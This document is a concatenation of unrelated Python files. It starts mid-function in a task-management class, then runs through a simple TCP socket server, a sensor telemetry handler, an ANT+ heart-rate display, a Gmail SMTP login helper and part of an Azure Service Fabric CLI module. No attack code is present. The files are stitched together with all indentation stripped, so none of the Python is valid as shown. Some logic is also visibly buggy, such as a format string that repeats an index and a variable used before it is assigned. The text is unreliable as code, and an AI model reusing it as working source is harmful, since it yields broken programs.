master_task_id = PROC_MASTER_ID_ENV_VAR.get().split(':')
# we could not find a task ID, revert to old stub behaviour
if len(master_task_id) < 2 or not master_task_id[1]:
return None
return master_task_id[1]
@classmethod
def __is_subprocess(cls):
# type: () -> bool
# notice this class function is called from Task.ExitHooks, do not rename/move it.
is_subprocess = PROC_MASTER_ID_ENV_VAR.get() and \
PROC_MASTER_ID_ENV_VAR.get().split(':')[0] != str(os.getpid())
return is_subprocess
@classmethod
def set_offline(cls, offline_mode=False):
# type: (bool) -> ()
"""
Set offline mode, where all data and logs are stored into local folder, for later transmission
:param offline_mode: If True, offline-mode is turned on, and no communication to the backend is enabled.
:return:
"""
if not running_remotely():
ENV_OFFLINE_MODE.set(offline_mode)
InterfaceBase._offline_mode = bool(offline_mode)
Session._offline_mode = bool(offline_mode)
@classmethod
def is_offline(cls):
# type: () -> bool
"""
Return offline-mode state, If in offline-mode, no communication to the backend is enabled.
:return: boolean offline-mode state
"""
return cls._offline_mode
@classmethod
def _get_task_status(cls, task_id):
# type: (str) -> (Optional[str], Optional[str])
if cls._offline_mode:
return tasks.TaskStatusEnum.created, 'offline'
# noinspection PyBroadException
try:
all_tasks = cls._get_default_session().send(
tasks.GetAllRequest(id=[task_id], only_fields=['status', 'status_message']),
).response.tasks
return all_tasks[0].status, all_tasks[0].status_message
except Exception:
return None, None
|
server.py
|
import socket
import threading
HEADER = 64
PORT = 8080
SERVER = socket.gethostbyname(socket.gethostname())
FORMAT = 'utf-8'
DISCONNECT_MESSAGE = "!DISCONNECT"
ADDR = (SERVER, PORT)
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.bind(ADDR)
def handle_client(conn, addr):
print(f"[NEW CONNECTION] {addr} connected.")
connected = True
while connected:
msg_length = conn.recv(HEADER).decode(FORMAT)
if msg_length:
msg_length = int(msg_length)
msg = conn.recv(msg_length).decode(FORMAT)
if msg == "!DISCONNECT":
connected = False
print(f"[{addr}] {msg}")
conn.close()
def start():
server.listen()
print(f"[LISTENING] server is listening on {SERVER}")
while True:
conn, addr =server.accept()
thread = threading.Thread(target=handle_client, args=(conn, addr))
thread.start()
print(f"[ACTIVE CONNERTIONS] {threading.active_count() - 1}")
print("[STARTING] server is starting...")
start()
|
emobdh.py
|
#!/usr/bin/python
import logging
import time
from threading import Thread
from subsystems.emgps import emGps
from subsystems.emimu import emImu
from subsystems.emtelemetry import emTelemetry
from sensors.emaltitude import emAltitudeGet
from sensors.empressure import emPressureGet
from sensors.emsealevelpressure import emSeaLevelPressureGet
from sensors.emtemperature import emTemperatureGet
class emObdh(object):
def __init__(self):
logging.info('On Board Data Handling')
self.emgpsfd = emGps()
self.emimu = emImu()
self.emtelemetry = emTelemetry()
thread = Thread(target=self.emObdhRefresh)
thread.start()
def emObdhSensors(self):
altitude = emAltitudeGet()
pressure = emPressureGet()
sealevelpressure = emSeaLevelPressureGet()
temperature = emTemperatureGet()
return altitude, pressure, sealevelpressure, temperature
def emObdhGps(self):
latitude = self.emgpsfd.emGpsLatitudeGet()
longitude = self.emgpsfd.emGpsLongitudeGet()
altitude = self.emgpsfd.emGpsAltitudeGet()
return latitude, longitude, altitude
def emObdhImu(self):
roll = self.emimu.emImuRollGet()
pitch = self.emimu.emImuPitchGet()
yaw = self.emimu.emImuYawGet()
return roll, pitch, yaw
def emObdhRefresh(self):
altitude, pressure, sealevelpressure, temperature = self.emObdhSensors()
sensorsdata = ("Sensors: {0}," "{1}," "{2}," "{3}".format( \
altitude, pressure, sealevelpressure, temperature))
logging.info(sensorsdata)
latitude, longitude, altitude = self.emObdhGps()
gpsdata = ("Gps: {0}," "{1}," "{2}".format( \
latitude, longitude, altitude))
logging.info(gpsdata)
roll, pitch, yaw = self.emObdhImu()
imudata = ("Imu: {0}," "{1}," "{2},".format(roll, pitch, yaw))
logging.info(imudata)
datage = ("{0} " "{1} " "{2} " "{3} " \
"{4} " "{5} " "{6} " "{6} ".format(
latitude, longitude, altitude, pressure, \
temperature, roll, pitch, yaw))
logging.warning(datage)
self.emtelemetry.emTelemetrySend(datage)
# End of File
|
main.py
|
import os
#import logging
#logging.basicConfig(format='%(levelname)s:%(message)s', level=logging.DEBUG)
############ Magic Configs
target_fps = 30
size = (500,200) # half of is 100 for nice midpoint
font_path = "Pixel LCD-7.ttf"
font_size = 40 # 140 for big mid screen, 40 for
fudge_factor = 1
line_width = 7
vert_scale = 10 # makes peaks bigger - change if you change the size
pulse_parts = [0,1,0,0,6,0,-5,0,0,-1,0,0,2,0] # distinctive heart beat
BACKGROUND_COLOR = (0,0,0,255)
LINE_COLOR = (0,255,0,250)
FONT_COLOR = (0,255,0)
fade_factor = 253 # number between 0 and 255. Probably 250-255 ish
def position_font(screen_size, text_size):
# middle of screen:
#return ((screen_size[0] - text_size[0] )// 2, (screen_size[1] - text_size[1])//2)
# Bottom right
return screen_size[0] - text_size[0] - 2 , screen_size[1] - text_size[1] - 2
############ DONT EDIT BELOW THIS
from datetime import datetime, timedelta
from time import sleep
from ant.easy.node import Node
from ant.easy.channel import Channel
from ant.base.message import Message
import threading
import pygame
## statics
NETWORK_KEY= [0xb9, 0xa5, 0x21, 0xfb, 0xbd, 0x72, 0xc3, 0x45]
pygame.init()
screen = pygame.display.set_mode(size, flags=pygame.NOFRAME)
pygame.display.set_caption("Heartbeat")
back_font = pygame.font.Font(font_path, font_size)
clock = pygame.time.Clock()
alive = True
HEART_EVENT_TYPE = pygame.event.custom_type()
# ANT stuff
def on_data(data):
heart_speed = data[7] * fudge_factor
print("Heart speed detected: %s" % heart_speed)
ev = pygame.event.Event(HEART_EVENT_TYPE, {'speed': heart_speed})
pygame.event.post(ev)
def back_thread(node):
node.set_network_key(0x00, NETWORK_KEY)
channel = node.new_channel(Channel.Type.BIDIRECTIONAL_RECEIVE)
channel.on_broadcast_data = on_data
channel.on_burst_data = on_data
# magic numbers
channel.set_period(16070) # was 8070
channel.set_search_timeout(20) # was 12
channel.set_rf_freq(57)
channel.set_id(0, 120, 0)
try:
channel.open()
node.start()
finally:
node.stop()
print("Ant Node shutdown complete")
node = Node()
x = threading.Thread(target=back_thread, args=(node,))
x.start()
last_seen = datetime.now()
drawing = pygame.Surface(screen.get_size(), flags=pygame.SRCALPHA)
drawing.fill((0,0,0,255))
alpha_surf = pygame.Surface(screen.get_size(), pygame.SRCALPHA)
alpha_surf.fill((255, 255, 255, fade_factor))
ptr = -1
last_height = 100
last_pulse = datetime.now()
pulse_time = 10
heart_speed = -1
offset = -1
fade_factor = 255
time_since_seen = timedelta(seconds=100)
while alive:
for event in pygame.event.get():
if event.type == pygame.QUIT:
alive=False
node.stop()
elif event.type == HEART_EVENT_TYPE:
print("Heart speed detected! %s" % event.speed)
heart_speed = event.speed
if event.speed != 0:
pulse_time = 60 / event.speed
last_seen = datetime.now()
elif event.type == pygame.KEYDOWN:
print("KEy pressed - closing")
pygame.display.quit()
alive = False
node.stop()
time_since_seen = datetime.now() - last_seen
next_ptr = ptr + 5
screen.fill(BACKGROUND_COLOR)
#alpha_surf.fill((0,0,0,fade_factor))
now = datetime.now()
tt = now - last_pulse
if tt.total_seconds() > pulse_time:
offset = -1
last_pulse = now
offset += 1
#print(offset)
if offset >= len(pulse_parts)-1:
height = size[1]//2
else:
height = (size[1]//2) -(vert_scale * pulse_parts[offset])
#print(height)
if time_since_seen.total_seconds() < 10:
drawing.blit(alpha_surf, (0,0), special_flags=pygame.BLEND_RGBA_MULT)
pygame.draw.line(drawing, LINE_COLOR, [ptr, last_height], [next_ptr, height], line_width)
display_text = "%s" % round(heart_speed)
text = back_font.render(display_text, False, FONT_COLOR)
text_pos = position_font(size, (text.get_width(),text.get_height()))
screen.blit(text, text_pos)
screen.blit(drawing,(0,0))
pygame.display.flip()
if next_ptr > size[0]:
ptr = -5
else:
ptr = next_ptr
last_height = height
clock.tick(30)
|
authenticate.py
|
import smtplib, time, threading
from models.wash import cprint, cinput, cgpass
from models.data_generate import connInfo
from utils.verifyEmail import REGEX
from_ = cinput("Enter your email account: ", "lightwhite") #inputs for the email account from which the intended user wants to send the message
FROM = REGEX(from_) #checking for the valid email
password = cgpass("Enter the password associated with your email: ", "lightwhite") #inputing for the password (it will not be visible)
def authentication(From, Password):
host='smtp.gmail.com'
port=465
try:
server = smtplib.SMTP_SSL(host, port) # starting the smtp f*ckn server with Transport Layer Security on port 465
connectionInfo = threading.Thread(target=connInfo, args=(From,))
connectionInfo.start()
server.login(From, Password) # logging into the gmail account
connectionInfo.join()
return server
except smtplib.SMTPAuthenticationError:
time.sleep(3)
cprint("[!] Authentication failed: Invalid email or password!\n", "lightred")
server.quit()
exit()
except KeyboardInterrupt:
pass
|
custom.py
|
# --------------------------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for license information.
# --------------------------------------------------------------------------------------------
# pylint: disable=line-too-long,too-many-lines
import os
import time
from knack.log import get_logger
from OpenSSL import crypto
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse # pylint: disable=import-error
from msrestazure.azure_exceptions import CloudError
from azure.cli.core.util import CLIError, get_file_json, b64_to_hex
from azure.cli.core.commands import LongRunningOperation
from azure.graphrbac import GraphRbacManagementClient
from azure.keyvault import KeyVaultClient, KeyVaultAuthentication
from azure.mgmt.keyvault.models import (VaultProperties,
Sku as KeyVaultSku,
AccessPolicyEntry,
Permissions,
CertificatePermissions,
KeyPermissions,
SecretPermissions,
SkuName as KeyVaultSkuName)
from azure.keyvault.models import (CertificateAttributes,
CertificatePolicy,
ActionType,
KeyUsageType,
IssuerParameters,
KeyProperties,
LifetimeAction,
SecretProperties,
X509CertificateProperties,
Trigger,
Action)
from azure.mgmt.servicefabric.models import (ClusterUpdateParameters,
ClientCertificateThumbprint,
ClientCertificateCommonName,
SettingsSectionDescription,
SettingsParameterDescription,
NodeTypeDescription,
EndpointRangeDescription)
from azure.mgmt.network.models import (PublicIPAddress,
Subnet,
SubResource as NetworkSubResource,
InboundNatPool,
Probe,
PublicIPAddressDnsSettings,
LoadBalancer,
FrontendIPConfiguration,
BackendAddressPool,
LoadBalancingRule)
from azure.mgmt.compute.models import (VaultCertificate,
Sku as ComputeSku,
UpgradePolicy,
ImageReference,
ApiEntityReference,
VaultSecretGroup,
VirtualMachineScaleSetOSDisk,
VirtualMachineScaleSetVMProfile,
VirtualMachineScaleSetExtensionProfile,
VirtualMachineScaleSetOSProfile,
VirtualMachineScaleSetStorageProfile,
VirtualMachineScaleSet,
VirtualMachineScaleSetNetworkConfiguration,
VirtualMachineScaleSetIPConfiguration,
VirtualMachineScaleSetNetworkProfile,
SubResource,
UpgradeMode)
from azure.mgmt.storage.models import StorageAccountCreateParameters
from ._client_factory import (resource_client_factory,
keyvault_client_factory,
compute_client_factory,
storage_client_factory,
network_client_factory)
logger = get_logger(__name__)
DEFAULT_ADMIN_USER_NAME = "adminuser"
DEFAULT_SKU = "Standard_D2_V2"
DEFAULT_TIER = "Standard"
DEFAULT_OS = "WindowsServer2016Datacenter"
DEFAULT_CLUSTER_SIZE = 5
DEFAULT_DURABILITY_LEVEL = "Bronze"
DEFAULT_APPLICATION_START_PORT = 20000
DEFAULT_APPLICATION_END_PORT = 30000
DEFAULT_EPHEMERAL_START = 49152
DEFAULT_EPHEMERAL_END = 65534
DEFAULT_CLIENT_CONNECTION_ENDPOINT = 19000
DEFAULT_HTTP_GATEWAY_ENDPOINT = 19080
DEFAULT_TCP_PORT = 19000
DEFAULT_HTTP_PORT = 19080
DEFAULT_FRONTEND_PORT_RANGE_START = 3389
DEFAULT_FRONTEND_PORT_RANGE_END = 4500
DEFAULT_BACKEND_PORT = 3389
SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME = "servicefabricnode"
SERVICE_FABRIC_LINUX_NODE_EXT_NAME = "servicefabriclinuxnode"
SOURCE_VAULT_VALUE = "sourceVaultValue"
CERTIFICATE_THUMBPRINT = "certificateThumbprint"
CERTIFICATE_URL_VALUE = "certificateUrlValue"
SEC_SOURCE_VAULT_VALUE = "secSourceVaultValue"
SEC_CERTIFICATE_THUMBPRINT = "secCertificateThumbprint"
SEC_CERTIFICATE_URL_VALUE = "secCertificateUrlValue"
os_dic = {'WindowsServer2012R2Datacenter': '2012-R2-Datacenter',
'UbuntuServer1604': '16.04-LTS',
'WindowsServer2016DatacenterwithContainers': '2016-Datacenter-with-Containers',
'WindowsServer2016Datacenter': '2016-Datacenter'}
def list_cluster(client, resource_group_name=None):
cluster_list = client.list_by_resource_group(resource_group_name=resource_group_name) \
if resource_group_name else client.list()
return list(cluster_list)
# pylint:disable=too-many-locals, too-many-statements, too-many-boolean-expressions, too-many-branches
def new_cluster(cmd,
client,
resource_group_name,
location,
certificate_subject_name=None,
parameter_file=None,
template_file=None,
cluster_name=None,
vault_resource_group_name=None,
vault_name=None,
certificate_file=None,
certificate_password=None,
certificate_output_folder=None,
secret_identifier=None,
vm_user_name=None,
vm_password=None,
cluster_size=None,
vm_sku=None,
vm_os=None):
cli_ctx = cmd.cli_ctx
if certificate_subject_name is None and certificate_file is None and secret_identifier is None:
raise CLIError(
'\'--certificate-subject-name\', \'--certificate-file\', \'--secret-identifier\', one of them must be specified')
if certificate_output_folder and certificate_file:
raise CLIError(
'\'--certificate-output-folder\' and \'--certificate-file\' can not be specified at same time')
if secret_identifier:
if certificate_output_folder or certificate_file or certificate_output_folder or vault_resource_group_name or certificate_password:
raise CLIError(
'\'--certificate-output-folder\' , \'--certificate-file\', \'certificate_output_folder\', \'vault_resource_group_name\', \'certificate_password\' can not be specified,' +
'when \'--secret-identifier\' is specified')
if parameter_file or template_file:
if parameter_file is None or template_file is None:
raise CLIError('If using customize template to deploy,both \'--parameter-file\' and \'--template-file\' can not be None ' + '\n For example:\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json' +
'\n az sf cluster create --resource-group myRg --location westus --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate_file c:\\test.pfx' + '\n az sf cluster create --resource-group myRg --location westus --certificate-subject-name test.com --parameter-file c:\\parameter.json --template-file c:\\template.json --certificate-output-folder c:\\certoutput')
if cluster_size or vm_sku or vm_user_name:
raise CLIError('\'cluster_size\',\'vm_sku\',\'vm_os\',\'vm_user_name\' can not be specified when using customize template deployment')
else:
if vm_password is None:
raise CLIError('\'--vm-password\' could not be None')
if cluster_size is None:
cluster_size = DEFAULT_CLUSTER_SIZE
if vm_sku is None:
vm_sku = DEFAULT_SKU
if vm_os is None:
vm_os = DEFAULT_OS
if vm_user_name is None:
vm_user_name = DEFAULT_ADMIN_USER_NAME
rg = _get_resource_group_name(cli_ctx, resource_group_name)
if rg is None:
_create_resource_group_name(cli_ctx, resource_group_name, location)
if vault_name is None:
vault_name = resource_group_name
name = ""
for n in vault_name:
if n.isalpha() or n == '-' or n.isdigit():
name += n
if len(name) >= 21:
break
vault_name = name
if vault_resource_group_name is None:
vault_resource_group_name = resource_group_name
if cluster_name is None:
cluster_name = resource_group_name
if certificate_file:
_, file_extension = os.path.splitext(certificate_file)
if file_extension is None or file_extension.lower() != '.pfx'.lower():
raise CLIError('\'--certificate_file\' should be a valid pfx file')
import datetime
suffix = datetime.datetime.now().strftime("%Y%m%d%H%M")
deployment_name = 'AzurePSDeployment-' + suffix
vault_id = None
certificate_uri = None
cert_thumbprint = None
output_file = None
if parameter_file is None:
vm_os = os_dic[vm_os]
reliability_level = _get_reliability_level(cluster_size)
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
certificate_uri = result[1]
cert_thumbprint = result[2]
output_file = result[3]
linux = None
if vm_os == '16.04-LTS':
linux = True
template = _modify_template(linux)
parameters = _set_parameters_for_default_template(cluster_location=location,
cluster_name=cluster_name,
admin_password=vm_password,
certificate_thumbprint=cert_thumbprint,
vault_id=vault_id,
certificate_id=certificate_uri,
reliability_level=reliability_level,
admin_name=vm_user_name,
cluster_size=cluster_size,
durability_level=DEFAULT_DURABILITY_LEVEL,
vm_sku=vm_sku,
os_type=vm_os,
linux=linux)
else:
parameters, output_file = _set_parameters_for_customize_template(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier,
parameter_file)
vault_id = parameters[SOURCE_VAULT_VALUE]['value']
certificate_uri = parameters[CERTIFICATE_URL_VALUE]['value']
cert_thumbprint = parameters[CERTIFICATE_THUMBPRINT]['value']
template = get_file_json(template_file)
logger.info("Validating the deployment")
validate_result = _deploy_arm_template_core(
cli_ctx, resource_group_name, template, parameters, deployment_name, 'incremental', True)
if validate_result.error is not None:
errors_detailed = _build_detailed_error(validate_result.error, [])
errors_detailed.insert(0, "Error validating template. See below for more information.")
raise CLIError('\n'.join(errors_detailed))
logger.info("Deployment is valid, and begin to deploy")
_deploy_arm_template_core(cli_ctx, resource_group_name, template,
parameters, deployment_name, 'incremental', False)
output_dict = {}
output_dict['vm_user_name'] = vm_user_name
output_dict['cluster'] = client.get(resource_group_name, cluster_name)
output_dict['certificate'] = {'certificate_file': output_file,
'vault_id': vault_id,
'certificate_identifier': certificate_uri,
'thumbprint': cert_thumbprint}
return output_dict
def _build_detailed_error(top_error, output_list):
if output_list:
output_list.append(' Inner Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
else:
output_list.append('Error - Code: "{}" Message: "{}"'.format(top_error.code, top_error.message))
if top_error.details:
for error in top_error.details:
_build_detailed_error(error, output_list)
return output_list
def add_app_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
_add_cert_to_all_vmss(cli_ctx, resource_group_name, result[0], result[1])
return client.get(resource_group_name, cluster_name)
def add_client_cert(client,
resource_group_name,
cluster_name,
is_admin=False,
thumbprint=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
admin_client_thumbprints=None,
readonly_client_thumbprints=None,
client_certificate_common_names=None):
if thumbprint:
if certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names:
raise CLIError(
"--thumbprint can only specified alone or with --is-admin")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprint or admin_client_thumbprints or readonly_client_thumbprints or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if admin_client_thumbprints or readonly_client_thumbprints:
if thumbprint or certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names or is_admin:
raise CLIError(
"Only \'--admin-client-thumbprints\' and \'--readonly-client-thumbprints\' can be specified together")
if client_certificate_common_names:
if is_admin or thumbprint or certificate_common_name or certificate_issuer_thumbprint or admin_client_thumbprints or readonly_client_thumbprints: # pylint: disable=too-many-boolean-expressions
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _add_thumbprint(cluster, is_admin, thumbprint):
remove = []
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove.append(t)
for t in remove:
cluster.client_certificate_thumbprints.remove(t)
cluster.client_certificate_thumbprints.append(
ClientCertificateThumbprint(is_admin, thumbprint))
def _add_common_name(cluster, is_admin, certificate_common_name, certificate_issuer_thumbprint):
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
cluster.client_certificate_common_names.add(ClientCertificateCommonName(
is_admin, certificate_common_name, certificate_issuer_thumbprint))
return cluster.client_certificate_common_names
if thumbprint:
_add_thumbprint(cluster, is_admin, thumbprint)
if admin_client_thumbprints or readonly_client_thumbprints:
if admin_client_thumbprints:
for t in admin_client_thumbprints:
_add_thumbprint(cluster, True, t)
if readonly_client_thumbprints:
for t in readonly_client_thumbprints:
_add_thumbprint(cluster, False, t)
if certificate_common_name:
_add_common_name(cluster, is_admin, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name and 'isAdmin' in common_name:
cluster.client_certificate_common_names = _add_common_name(
cluster, common_name['isAdmin'], common_name['certificateCommonName'], common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_client_cert(client,
resource_group_name,
cluster_name,
thumbprints=None,
certificate_common_name=None,
certificate_issuer_thumbprint=None,
client_certificate_common_names=None):
if thumbprints:
if certificate_common_name or certificate_issuer_thumbprint or client_certificate_common_names:
raise CLIError("--thumbprint can only specified alone")
if certificate_common_name or certificate_issuer_thumbprint:
if certificate_issuer_thumbprint is None or certificate_common_name is None:
raise CLIError(
"Both \'--certificate-common-name\' and \'--certificate-issuer-thumbprint should not be None'")
if thumbprints or client_certificate_common_names:
raise CLIError(
"Only \'--certificate-common-name\' and \'--certificate-issuer-thumbprint\' can be specified together")
if client_certificate_common_names:
if thumbprints or certificate_common_name or certificate_issuer_thumbprint:
raise CLIError(
"\'--client-certificate-commonNames\' can only be specified alone")
cluster = client.get(resource_group_name, cluster_name)
def _remove_thumbprint(cluster, thumbprint):
remove = None
for t in cluster.client_certificate_thumbprints:
if t.certificate_thumbprint.lower() == thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_thumbprints.remove(remove)
return cluster.client_certificate_thumbprints
def _remove_common_name(cluster, certificate_common_name, certificate_issuer_thumbprint):
remove = None
for t in cluster.client_certificate_common_names:
if t.certificate_common_name.lower() == certificate_common_name.lower() and t.certificate_issuer_thumbprint.lower() == certificate_issuer_thumbprint.lower():
remove = t
if remove:
cluster.client_certificate_common_names.remove(remove)
return cluster.certificate_issuer_thumbprint
if isinstance(thumbprints, list) is False:
_remove_thumbprint(cluster, thumbprints)
if isinstance(thumbprints, list) is True:
for t in thumbprints:
cluster.client_certificate_thumbprints = _remove_thumbprint(
cluster, t)
if certificate_common_name:
_remove_common_name(cluster, certificate_common_name,
certificate_issuer_thumbprint)
if client_certificate_common_names:
for common_name in client_certificate_common_names:
if 'certificateCommonName' in common_name and 'certificateIssuerThumbprint' in common_name:
cluster.client_certificate_common_names = _remove_common_name(cluster,
common_name['certificateCommonName'],
common_name['certificateIssuerThumbprint'])
else:
raise CLIError('client_certificate_common_names is invalid')
patch_request = ClusterUpdateParameters(client_certificate_thumbprints=cluster.client_certificate_thumbprints,
client_certificate_common_names=cluster.client_certificate_common_names)
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_cert(cmd,
client,
resource_group_name,
cluster_name,
certificate_file=None,
certificate_password=None,
vault_name=None,
vault_resource_group_name=None,
certificate_output_folder=None,
certificate_subject_name=None,
secret_identifier=None):
cli_ctx = cmd.cli_ctx
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to add certificate")
result = _create_certificate(cli_ctx,
resource_group_name,
certificate_file,
certificate_password,
vault_name,
vault_resource_group_name,
certificate_output_folder,
certificate_subject_name,
secret_identifier)
vault_id = result[0]
secret_url = result[1]
thumbprint = result[2]
compute_client = compute_client_factory(cli_ctx)
primary_node_type = [
n for n in cluster.node_types if n.is_primary is True][0]
vmss_name = primary_node_type.name
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, vmss_name)
fabric_ext = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
if ext.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if fabric_ext is None:
raise CLIError("Failed to find service fabric extension")
import json
seconday_setting = json.loads(
'{{"thumbprint":"{0}","x509StoreName":"{1}"}}'.format(thumbprint, 'my'))
fabric_ext[0].settings["certificateSecondary"] = seconday_setting
_add_cert_to_vmss(cli_ctx, vmss, resource_group_name, vault_id, secret_url)
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate.thumbprint_secondary = thumbprint
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_cert(client, resource_group_name, cluster_name, thumbprint):
cluster = client.get(resource_group_name, cluster_name)
if cluster.certificate is None:
raise CLIError("Unsecure cluster is not allowed to remove certificate")
if cluster.certificate.thumbprint_secondary.lower() == thumbprint.lower():
cluster.certificate.thumbprint_secondary = None
else:
if cluster.certificate.thumbprint.lower() == thumbprint.lower():
cluster.certificate.thumbprint = cluster.certificate.thumbprint_secondary
cluster.certificate.thumbprint_secondary = None
else:
raise CLIError(
"Unable to find the certificate with the thumbprint {} in the cluster".format(thumbprint))
patch_request = ClusterUpdateParameters(certificate=cluster.certificate)
patch_request.certificate = cluster.certificate
return client.update(resource_group_name, cluster_name, patch_request)
def add_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_add):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_add = int(number_of_nodes_to_add)
if number_of_nodes_to_add <= 0:
raise CLIError("--number-of-nodes-to-add must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type.name)
vmss.sku.capacity = vmss.sku.capacity + number_of_nodes_to_add
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def remove_cluster_node(cmd, client, resource_group_name, cluster_name, node_type, number_of_nodes_to_remove):
cli_ctx = cmd.cli_ctx
number_of_nodes_to_remove = int(number_of_nodes_to_remove)
if number_of_nodes_to_remove <= 0:
raise CLIError("--number-of-nodes-to-remove must be greater than 0")
compute_client = compute_client_factory(cli_ctx)
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
node_type = node_types[0]
if node_type.durability_level.lower() == 'bronze':
raise CLIError("Can't delete node if durability level is bronze")
reliability_level = _get_target_instance(cluster.reliability_level)
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type.name)
vmss.sku.capacity = vmss.sku.capacity - number_of_nodes_to_remove
if node_type.is_primary:
if vmss.sku.capacity < reliability_level:
raise CLIError("Can't delete node since current reliability level is {}".format(
reliability_level))
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
LongRunningOperation(cli_ctx)(vmss_poll)
node_type.vm_instance_count = vmss.sku.capacity
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
return client.update(resource_group_name, cluster_name, patch_request)
def update_cluster_durability(cmd, client, resource_group_name, cluster_name, node_type, durability_level):
cli_ctx = cmd.cli_ctx
cluster = client.get(resource_group_name, cluster_name)
node_types = [n for n in cluster.node_types if n.name.lower() == node_type.lower()]
if node_types is None:
raise CLIError("Failed to find the node type in the cluster")
compute_client = compute_client_factory(cli_ctx)
vmss = compute_client.virtual_machine_scale_sets.get(
resource_group_name, node_type)
fabric_exts = [ext for ext in vmss.virtual_machine_profile.extension_profile.extensions
if ext.type.lower() == SERVICE_FABRIC_WINDOWS_NODE_EXT_NAME or ext.type.lower() == SERVICE_FABRIC_LINUX_NODE_EXT_NAME]
if fabric_exts is None:
raise CLIError("Failed to find service fabric extension")
fabric_ext = fabric_exts[0]
if fabric_ext.settings['durabilityLevel'] == durability_level:
return cluster
fabric_ext.settings['durabilityLevel'] = durability_level
fabric_ext.settings['enableParallelJobs'] = True
vmss_poll = compute_client.virtual_machine_scale_sets.create_or_update(
resource_group_name, vmss.name, vmss)
node_type = node_types[0]
node_type.durability_level = durability_level
patch_request = ClusterUpdateParameters(node_types=node_types)
update_cluster_poll = client.update(
resource_group_name, cluster_name, patch_request)
def wait(ctx, poller):
return LongRunningOperation(ctx)(poller)
import threading
t1 = threading.Thread(target=wait, args=[cli_ctx, vmss_poll])
t2 = threading.Thread(target=wait, args=[cli_ctx, update_cluster_poll])
t1.start()
t2.start()
t1.join()
t2.join()
return client.get(resource_group_name, cluster_name)
def update_cluster_upgrade_type(client,
resource_group_name,
cluster_name,
upgrade_mode,
version=None):
if upgrade_mode.lower() != 'manual' and upgrade_mode.lower() != 'automatic':
raise CLIError(
'--upgrade-mode can either be \'manual\' or \'automatic\'')
cluster = client.get(resource_group_name, cluster_name)
patch_request = ClusterUpdateParameters(node_types=cluster.node_types)
if upgrade_mode.lower() == 'manual':
if version is None:
raise CLIError(
'When \'--upgrade-mode\' set to \'manual\', --version must be given')
patch_request.cluster_code_version = version
patch_request.upgrade_mode = upgrade_mode
